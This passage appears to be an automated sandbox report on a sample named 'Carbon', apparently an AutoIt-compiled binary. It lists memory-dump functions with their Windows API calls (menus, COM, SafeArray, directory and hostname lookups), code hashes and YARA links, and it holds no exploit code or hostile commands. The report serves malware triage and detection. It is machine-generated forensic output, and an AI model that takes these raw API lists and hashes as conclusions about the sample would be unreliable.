                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                            • String ID:
                                                            • API String ID: 429561992-0
                                                            • Opcode ID: 284c225f62705f3c7e1acbeb8e8679f003e8f9f99a50051cfc288d2fe4145527
                                                            • Instruction ID: bbaf2b98a66bbc8a2b5f0373ba8f631cf1af35095d1772d2b92a9005275d51f4
                                                            • Opcode Fuzzy Hash: 284c225f62705f3c7e1acbeb8e8679f003e8f9f99a50051cfc288d2fe4145527
                                                            • Instruction Fuzzy Hash: 78C136726083059FD700DF68C88492BB7E9FF89748F14895DF99A9B261D730ED05CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00968205 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00968262
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009682FE
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00968312
                                                            • CoCreateInstance.OLE32(00990CF0,00000000,00000001,009B7E7C,?), ref: 0096835E
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009683E3
                                                            • CoTaskMemFree.OLE32(?,?), ref: 0096843B
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 009684C6
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009684E9
                                                            • CoTaskMemFree.OLE32(00000000), ref: 009684F0
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00968545
                                                            • CoUninitialize.OLE32 ref: 0096854B
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                            • String ID:
                                                            • API String ID: 2762341140-0
                                                            • Opcode ID: 3a94f4847d78085f4cfea8c6f5f472e21bc20f3ad0c8bce26b829a66642247f8
                                                            • Instruction ID: 0da3548f5b90a21d74c60650bec685b88d464360927e72039051dbc3f71426d6
                                                            • Opcode Fuzzy Hash: 3a94f4847d78085f4cfea8c6f5f472e21bc20f3ad0c8bce26b829a66642247f8
                                                            • Instruction Fuzzy Hash: ABC10775A00219AFCB14DFA4C884DAEBBB9FF48344B148599F51ADB361DB30EE45CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095010F Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00950136
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0095018F
                                                            • VariantInit.OLEAUT32(?), ref: 009501A1
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 009501C1
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00950214
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00950228
                                                            • VariantClear.OLEAUT32(?), ref: 0095023D
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 0095024A
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00950253
                                                            • VariantClear.OLEAUT32(?), ref: 00950265
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00950270
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: f7ea15c6d275894f9222c46358713ae23319d7ec0978367c3bdcbee57c9f982c
                                                            • Instruction ID: b10b66bc00ce7deb51279ff55f3862c12a2ebbc8295c9555c125f08308a6e34a
                                                            • Opcode Fuzzy Hash: f7ea15c6d275894f9222c46358713ae23319d7ec0978367c3bdcbee57c9f982c
                                                            • Instruction Fuzzy Hash: E7417231A04219DFCF04DF69D8489AEBBB9FF48355F008029E915A73A1DB30A945CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00984404 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateMenu.USER32 ref: 00984437
                                                            • SetMenu.USER32(?,00000000), ref: 00984446
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009844CE
                                                            • IsMenu.USER32(?), ref: 009844E2
                                                            • CreatePopupMenu.USER32 ref: 009844EC
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00984519
                                                            • DrawMenuBar.USER32 ref: 00984521
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID: 0$F
                                                            • API String ID: 161812096-3044882817
                                                            • Opcode ID: 63f40451c27d14fdf09e4a3305a4f7ed0c04b954340b226bff03fa1257567c76
                                                            • Instruction ID: d237ca251fb2617141a2e53f45b81f4878cee0635f6b0471f79f5a384fc828c0
                                                            • Opcode Fuzzy Hash: 63f40451c27d14fdf09e4a3305a4f7ed0c04b954340b226bff03fa1257567c76
                                                            • Instruction Fuzzy Hash: F44115B5A1220AAFDF14DF64E884AAE7BB9FF49314F140029F945973A0D770A910DF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009525C1 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00952646
                                                            • GetDlgCtrlID.USER32 ref: 00952651
                                                            • GetParent.USER32 ref: 0095266D
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00952670
                                                            • GetDlgCtrlID.USER32(?), ref: 00952679
                                                            • GetParent.USER32(?), ref: 0095268D
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00952690
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 711023334-1403004172
                                                            • Opcode ID: c30a18e878ea9c7e96d2d529926bc260910181a7662efe6a0bbe4484cb07e2cb
                                                            • Instruction ID: c17a0cb2ba36702658cb55225c16e83076bf79b1ee95703378882fd8969e02bc
                                                            • Opcode Fuzzy Hash: c30a18e878ea9c7e96d2d529926bc260910181a7662efe6a0bbe4484cb07e2cb
                                                            • Instruction Fuzzy Hash: 662104B4D05118BBCF04EFA4CC84EEEBBB8EF05320F004506B951932E1DA785809EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009841E1 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0098425B
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0098425E
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00984285
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009842A8
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00984320
                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0098436A
                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00984385
                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 009843A0
                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 009843B4
                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 009843D1
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: 2f01f37ef70200865ae76771c9a6cb5cc7ad4c0b72002c40e09e9d1db8887f4d
                                                            • Instruction ID: 30faec9d6c60cd4578a1e2e01806e9574ec84493c1cda9d0d109ac3dc30a3780
                                                            • Opcode Fuzzy Hash: 2f01f37ef70200865ae76771c9a6cb5cc7ad4c0b72002c40e09e9d1db8887f4d
                                                            • Instruction Fuzzy Hash: EE615975900209AFDB10EFA8CD81FEE77B8AF49710F10015AFA14EB3A1D7B4AA41DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0096855F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0096871C
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00968730
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0096875A
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00968774
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00968786
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 009687CF
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0096881F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile
                                                            • String ID: *.*
                                                            • API String ID: 769691225-438819550
                                                            • Opcode ID: 2816c39f46fffb2a715db6ff9520db8165677f079af21ecf50716c51af0ee976
                                                            • Instruction ID: 22450a241f47de2a8b3a819b2c76113355fbcddb6429dac5e87fe69116cf8c3c
                                                            • Opcode Fuzzy Hash: 2816c39f46fffb2a715db6ff9520db8165677f079af21ecf50716c51af0ee976
                                                            • Instruction Fuzzy Hash: 89818D725043459BCB24EF24C854AABB3E9BF88314F584E2EF985D7250DB34E945CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F62A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 008F6337
                                                              • Part of subcall function 008F63C7: GetClientRect.USER32(?,?), ref: 008F63ED
                                                              • Part of subcall function 008F63C7: GetWindowRect.USER32(?,?), ref: 008F642E
                                                              • Part of subcall function 008F63C7: ScreenToClient.USER32(?,?), ref: 008F6456
                                                            • GetDC.USER32 ref: 0093509B
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009350AE
                                                            • SelectObject.GDI32(00000000,00000000), ref: 009350BC
                                                            • SelectObject.GDI32(00000000,00000000), ref: 009350D1
                                                            • ReleaseDC.USER32(?,00000000), ref: 009350D9
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0093516A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 09e88c8f414f512c3c129f6fc5bf61ad36d98bc0e46df6b2b8f45058daf34977
                                                            • Instruction ID: 543a3352997f916813894f8762e869b1a3334ecf6db66aed5b3938c6a1ac0da7
                                                            • Opcode Fuzzy Hash: 09e88c8f414f512c3c129f6fc5bf61ad36d98bc0e46df6b2b8f45058daf34977
                                                            • Instruction Fuzzy Hash: 36711F30508609EFCF258FA4C884ABA3BB9FF49314F150269EE559A2A6D731CC50EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00984044 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009840E3
                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 009840F8
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00984112
                                                            • _wcslen.LIBCMT ref: 00984157
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00984184
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009841B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcslen
                                                            • String ID: SysListView32
                                                            • API String ID: 2147712094-78025650
                                                            • Opcode ID: ccb19dc0e53d95a1fa409469316872430d7b4725e027a5e4df517d8c60de4ade
                                                            • Instruction ID: 85414ec62394d9b019166a4fac26c378699976d0d7d2dfc94871b71f96ea29f1
                                                            • Opcode Fuzzy Hash: ccb19dc0e53d95a1fa409469316872430d7b4725e027a5e4df517d8c60de4ade
                                                            • Instruction Fuzzy Hash: A641C071A00319ABEB21AF64CC49FEB7BA9EF58360F100526F914E7291D7759990CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095C35F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0095C3FE
                                                            • IsMenu.USER32(00000000), ref: 0095C41E
                                                            • CreatePopupMenu.USER32 ref: 0095C454
                                                            • GetMenuItemCount.USER32(00B5F2F8), ref: 0095C4A5
                                                            • InsertMenuItemW.USER32(00B5F2F8,?,00000001,00000030), ref: 0095C4CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 0$2
                                                            • API String ID: 93392585-3793063076
                                                            • Opcode ID: 56e2783222de01e8dc95c91f915b0550c9dc87c8045a8e3f5130379bd05f7a79
                                                            • Instruction ID: a3f3f85071336bea30e13e2f1f748c82dce121cb538481d2881f1fb5c074ade4
                                                            • Opcode Fuzzy Hash: 56e2783222de01e8dc95c91f915b0550c9dc87c8045a8e3f5130379bd05f7a79
                                                            • Instruction Fuzzy Hash: 1551ADB06013059FDF20CFAAD894BBEBBF8AF45316F148119EC05E72A1D3749949CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095E468 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 642191829-3771769585
                                                            • Opcode ID: 1d0a0d3aee24efa82ef5d29c1fd89f423e9a21f098a89185896dc97837bd60b9
                                                            • Instruction ID: 871a6f97431c1681ced4bd8c04e740e7203cadea103a21e8427c9ac8a978b385
                                                            • Opcode Fuzzy Hash: 1d0a0d3aee24efa82ef5d29c1fd89f423e9a21f098a89185896dc97837bd60b9
                                                            • Instruction Fuzzy Hash: 81112472505118ABCF24AB719C0AEEE776CDF84725F000065F984920D1FF758BC59BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009740CE Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 009740F2
                                                            • CharUpperBuffW.USER32(?,?), ref: 00974201
                                                            • _wcslen.LIBCMT ref: 00974211
                                                            • VariantClear.OLEAUT32(?), ref: 009743A6
                                                              • Part of subcall function 009613C8: VariantInit.OLEAUT32(00000000), ref: 00961408
                                                              • Part of subcall function 009613C8: VariantCopy.OLEAUT32(?,?), ref: 00961411
                                                              • Part of subcall function 009613C8: VariantClear.OLEAUT32(?), ref: 0096141D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4137639002-1221869570
                                                            • Opcode ID: 25e81b220356c04b4c4043be84efd08dc23dd2b6b658e7a336617a692cfbb31f
                                                            • Instruction ID: b402109d481d672f477114d0e63a93b2d7130054c8e1b1fdd83fe800a2d7b5e9
                                                            • Opcode Fuzzy Hash: 25e81b220356c04b4c4043be84efd08dc23dd2b6b658e7a336617a692cfbb31f
                                                            • Instruction Fuzzy Hash: 929168756083059FCB04EF28C58096AB7E9FF88714F14882DF99A9B352DB31ED45CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0098858A Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(00B5F500), ref: 00988623
                                                            • IsWindowEnabled.USER32(00B5F500), ref: 0098862F
                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0098870A
                                                            • SendMessageW.USER32(00B5F500,000000B0,?,?), ref: 0098873D
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00988775
                                                            • GetWindowLongW.USER32(00B5F500,000000EC), ref: 00988797
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009887AF
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: 8d40eeb5ff9778d5aff68576637d605c49ab166dd8f9cf075ef30ee61f3a9a44
                                                            • Instruction ID: 59682405adcd63815b9e2fc923dc641de90e989f2d920f1462a0dae827824a2b
                                                            • Opcode Fuzzy Hash: 8d40eeb5ff9778d5aff68576637d605c49ab166dd8f9cf075ef30ee61f3a9a44
                                                            • Instruction Fuzzy Hash: 40719D74605204AFEF21AF64C894FAB7BB9FF49310FA44059F845973A1DB31AC40DB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095E048 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0095E062
                                                            • LoadStringW.USER32(00000000), ref: 0095E069
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0095E07F
                                                            • LoadStringW.USER32(00000000), ref: 0095E086
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0095E0CA
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0095E0A7
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
